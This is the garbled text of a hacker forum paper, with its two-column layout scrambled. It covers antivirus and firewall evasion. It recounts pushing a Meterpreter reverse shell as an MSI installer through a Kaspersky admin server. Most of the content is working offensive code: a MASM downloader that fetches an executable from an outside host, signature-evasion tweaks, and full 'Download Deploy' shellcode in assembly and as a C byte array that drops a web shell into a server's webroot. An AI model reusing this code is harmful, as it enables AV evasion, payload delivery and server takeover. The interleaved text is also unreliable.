a stupid AV server. A Kasper-sky computer with patches and installers, quick server was running and that was used to taught! manage the entire network. Well payload encoding work but, certain vulnerabilities What If I make a Metpreter_reverse_tcp and multiple exploitation is not possible so if you fail push it as a patch to the client computers will it first you will lose the game, so different ideas work?? and taught s popped in my head and this paper is an implementation of that. Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode
  • 2. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” [2] I had situation before too, were server was behind a firewall and was not able to get reverse/bind shell because of AV/Firewall I need a way to bypass that. [3] Will the things I did above could be done with a domain controller too? Answer to Q no [3] by Wirless Punter" suggested a better strategy which he tried before. [-] Make a VBS or Bat script which creates a new Steps: user and then enable telnet. [+] Made the metpreter and moved to Admin [-] Push the script as update, simple and very server effective " [-] Admin server dint detect the default non encoded metpreter as a virus , No idea why :O Question No [1] and [2]'s answer is what this [+] Shut down the remote AV client form admin paper is all about server [-] Kaspersky Admin kit had a feature to build an installer out of an executable [+] Converted the metpreter .exe to .msi installer, seems like the AV signs the payload when this is done [+] Pushed it to client And royal woot woot we had a metpreter, same way we could have shelled the entire network , took enough POCs and headed home. Thanks to D4rkest for his great support and ideas. Well PT was over but few question remained And the best way to hack an application is RTFM[Read the f$$$$$# manual] http://utils.kaspersky.com/docs/engl...admguid een.pdf [1] Why did the AV admin server dint detect the Msf non encoded payload when moved to admin server, when it was getting detected on client machines? Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode
  • 3. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” Anti Virus Evading techniques, and ;------------------------------------------ analyzing the quality of an AV - ; Comilied with MASM32 .586 .model flat,stdcall option casemap:none Signature based detection: Analyzing include C:masm32includewindows.inc Efficacy and Bypassing detection include C:masm32includeuser32.inc include C:masm32includekernel32.inc Wiki: include C:masm32includeshell32.inc include C:masm32includeurlmon.inc http://en.wikipedia.org/wiki/Antivirus_software includelib masm32libuser32.lib Compares the contents of a file to a dictionary includelib masm32libkernel32.lib of virus signatures. includelib masm32libshell32.lib includelib masm32liburlmon.lib Analyzing the efficacy of an AV: .data URL db "http://110.0.0.1:84/msgbox.exe",0 Test 1 EXIT db "ExitProcess" PATH db "c:testsas.exe",0 Testing for false positives, I started with a simple test shell code program, a skeleton that's .data res dd ? used to execute test shell codes, added few Nop instruction to it, "currently the exe is absolutely .code harmless". #include<stdio.h> ; --------------------http://FB1H2S.com char code[]="/x90/x90"; fb1h2s http://Garage4Hackers.com----------- int main(int argc, char **argv) ------------------------------------------- { - int (*func)(); func = (int (*)()) code; (int)(*func)(); start: } invoke URLDownloadToFile,0,addr URL,addr PATH,0,0 invoke ExitProcess,0 Uploaded to Virus total and obtained the following results. end start Here , Here: Ya one False positive by Quick heal. [-] Moved form C to ASM as now we could strike a little deeper [-] Build a quick download virus to destination payload Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode
  • 4. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” And on compiling and linking the application Without exit function the payload still works itself my AVG scanner popped alerting me the output executable was scanned and and my about the payload. AVG said it was clean. And that's how signature based detection works how dump it is. So function calls Urldownloadtofile + Exit process the combination would be what AVG would have build its signature with. Ok so what if I remove Exitprocess and compile the Heuristics: Considering shell codes it’s program. not affected much ;------------------------------------------- Runs the payload on a sandbox and identifies ; Comilied with MASM32 the behavior: AV plants hooks to certain critical .586 .model flat,stdcall system calls and monitors those activities , so option casemap:none Reverse/Bind shell and socket operations are at include C:masm32includewindows.inc times an Issue. include C:masm32includeuser32.inc include C:masm32includekernel32.inc include C:masm32includeshell32.inc include C:masm32includeurlmon.inc So the taught is how to bypass Signature includelib masm32libuser32.lib Detection + above mentioned Heuristics + includelib masm32libkernel32.lib Firewall issues includelib masm32libshell32.lib includelib masm32liburlmon.lib .data DownLoadFile + ExcuteFile + ExitProcess URL db "http://110.0.0.1:84/msgbox.exe",0 EXIT db "ExitProcess" PATH db "c:testsas.exe",0 .data No way this could escape the heuristic behavior res dd ? , well downloading a program won't create .code much panic but trying to execute it would cause suspicion .Well obviously it would not be of any ; --------------------http://FB1H2S.com fb1h2s use if the payload just downloads the file and http://Garage4Hackers.com----------------------- -------------------------------- dsn't trigger it, and triggering it is where the problem occurs. start: invoke URLDownloadToFile,0,addr URL,addr So what is the alternative? PATH,0,0 ;invoke ExitProcess,0 Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode end start
  • 5. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” ;#File: Download_deploy.asm [+] Download Execute will cause troubles to our ; [BITS 32] payload. global _start [-] If we just download the executable that won’t be of any use _start: [+] And AV/Firewall could make situations tough jmp short entry ; by not letting us give reverse shell %include "kernal32.asm" [+] And if the application we are begin: targeting[Apache old version] is behind a call find_kernel32 mov ebx, eax firewall and even if we were able to execute jmp short u ; Skip code we can’t get a shell back because of the entry: firewall. call begin [-] So why not use a web shell , some Php or u: push 0xec0e4e8e ; LoadLibraryA hash asp shell if target has got a web server. push ebx ; kernel32 base address call find_function ; find address [+] A payload that would download a web shell and place it on the servers WebRoot directory. ; LoadLibraryA PUSH 0x00206e6f Or simply writes a new web shell . PUSH 0x6d6c7275 xor ecx, ecx mov [esp + 9],cl mov ecx , esp All firewall let's web server's traffic and push ecx WebShell's "Hardly I have seen any getting call eax ; eax holds our function address detected by AV" . So that budded the idea of a download: Download + Deploy payload. push 0x702f1a36 ; URLDownloadToFileAhash push eax ; u-lmon.dll base address call find_function ; find address Download + Executes triggers AV alert pop edi xor ebp, ebp So just Download a WebShell and PUSH 0x58202020 ; path to deploy PUSH 0x7073612e drops it in WebRoot PUSH 0x735c746f PUSH 0x6f727777 PUSH 0x775c6275 PUSH 0x7074656e PUSH 0x495c3a43 mov ebp , esp You could get a semi interactive shell and will xor ecx, ecx ; ecx = 0 we need it work fine even in case of AV and firewall. mov [ebp + 24], cl ;ebp no null PUSH 0x58202065 ; url to file ##################################### PUSH 0x78652e61 PUSH 0x2f34383a # Title ownload Deploy Shell code by FB1H2S PUSH 0x312e302e PUSH 0x302e3732 # Date: [18/1/2011] PUSH 0x312f2f3a # Author: FB1H2S PUSH 0x70747468 mov edi, esp # Tested on: [Works form win xp to Win 7 all mov [edi + 25], cl ; edi no null push ecx ; lpfnCB versions] push ecx ; dwReserved push ebp ; szFileName # Paths hardcoded, could port to msf push edi ;url #Place the webshell to be uploaded on ur local push ecx ; pCaller call eax ; eax holds our function a server webroot exit: push 0x73e2d87e ; ExitProcess hash push ebx ; kernel32 base address call find_function ; find address ; ExitProcess call eax ; holds our function address Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode
  • 6. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” ;# Test the Shell Code: ;# ;#Code file: kernal.asm ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Code: ;;;;;;;;;;;;;; // Download file form location find_kernel32: //Url hardcoded so not Use full for all xor eax, eax ; clear eax yet mov eax, [fs:0x30 ] ; pointer to the PEB #include<stdio.h> mov eax, [ eax + 0x0C ] ; get PEB->Ldr mov eax, [ eax + 0x14 ] ; get PEB- char code[] = >Ldr.InMemoryOrderModuleList.Flink "xebx70x31xc0x64xa1x30x00" ; (1st entry) "x00x00x8bx40x0cx8bx40x14" mov eax, [ eax ] ; (2nd entry) "x8bx00x8bx00x8bx40x10xc3" mov eax, [ eax ] ; (3rd entry) mov eax, [ eax + 0x10 ] ;3rd entries base "x60x8bx6cx24x24x8bx45x3c" address "x8bx54x05x78x01xeax8bx4a" ; eax = kernel32.dll works on all windows "x18x8bx5ax20x01xebxe3x37" versions xp to win 7 "x49x8bx34x8bx01xeex31xff" ret "x31xc0xfcxacx84xc0x74x0a" "xc1xcfx0dx01xc7xe9xf1xff" find_function: "xffxffx3bx7cx24x28x75xde" pushad ; Save all "x8bx5ax24x01xebx66x8bx0c" registers mov ebp, [esp + 0x24] "x4bx8bx5ax1cx01xebx8bx04" mov eax, [ebp + 0x3c] "x8bx01xe8x89x44x24x1cx61" mov edx, [ebp + eax + 0x78] "xc3xe8x94xffxffxffx89xc3" add edx, ebp "xebx05xe8xf2xffxffxffx68" mov ecx, [edx + 0x18] mov ebx, [edx + 0x20] "x8ex4ex0execx53xe8x96xff" add ebx, ebp "xffxffx68x6fx6ex20x00x68" find_function_loop: "x75x72x6cx6dx31xc9x88x4c" jecxz find_function_finished "x24x09x89xe1x51xffxd0x68" dec ecx mov esi, [ebx + ecx * 4] "x36x1ax2fx70x50xe8x76xff" add esi, ebp "xffxffx5fx31xedx68x20x20" "x20x00x68x2ex61x73x70x68" compute_hash: "x6fx74x5cx73x68x77x77x72" xor edi, edi ; Zero edi xor eax, eax ; Zero eax "x6fx68x75x62x5cx77x68x6e" cld ; Clear "x65x74x70x68x43x3ax5cx49" direction "x89xe5x31xc9x88x4dx18x68" "x65x20x20x00x68x61x2ex65" compute_hash_again: lodsb ; Load the "x78x68x3ax38x34x2fx68x2e" next byte from esi into al "x30x2ex31x68x32x37x2ex30" test al, al ; Test "x68x3ax2fx2fx31x68x68x74" ourselves. "x74x70x89xe7x88x4fx1ax51" jz compute_hash_finished ; If the ZF is set, we've hit the null term. "x51x55x57x51xffxd0x68x7e" ror edi, 0xd ; Rotate "xd8xe2x73x53xe8x0fxffxff" edi 13 bits to the right "xffxffxd0"; add edi, eax ; Add the int main(int argc, char **argv) new byte to the accumulator jmp compute_hash_again ; Next { iteration int (*func)(); func = (int (*)()) code; compute_hash_finished: (int)(*func)(); find_function_compare: cmp edi, [esp + 0x28] } jnz find_function_loop mov ebx, [edx + 0x24] add ebx, ebp mov cx, [ebx + 2 * ecx] mov ebx, [edx + 0x1c] add ebx, ebp mov eax, [ebx + 4 * ecx] add eax, ebp Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- mov [esp + 0x1c], eax Evolution-of-Download-Deploy-Shellcode find_function_finished: popad ; Restore all registers ret
  • 7. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” [+] Issues: Url and path are Hard Coded so its Use less I published the code to get suggestions so that I could make an Improved version of code and make a Metsploit module [-] Currently Web Root path is Hard coded and I can’t think about a way if web root is changed [-] Need a solution to dynamically finds the web roots IIS and Apache to make the Shell code better. [-] Codes and betters images form: http://www.garage4hackers.com/showthread.p hp?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode #And all greets to Garage Hackers and Null Members. #http://www.garage4hackers.com/forum.php B0Nd,Eberly,Wipu,Vinnu,w4ri0r,empty,neo,Ro hith,Sids786,SmartKD,Tia,d4rkest,Atul,beenu, Nishant,prashant Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode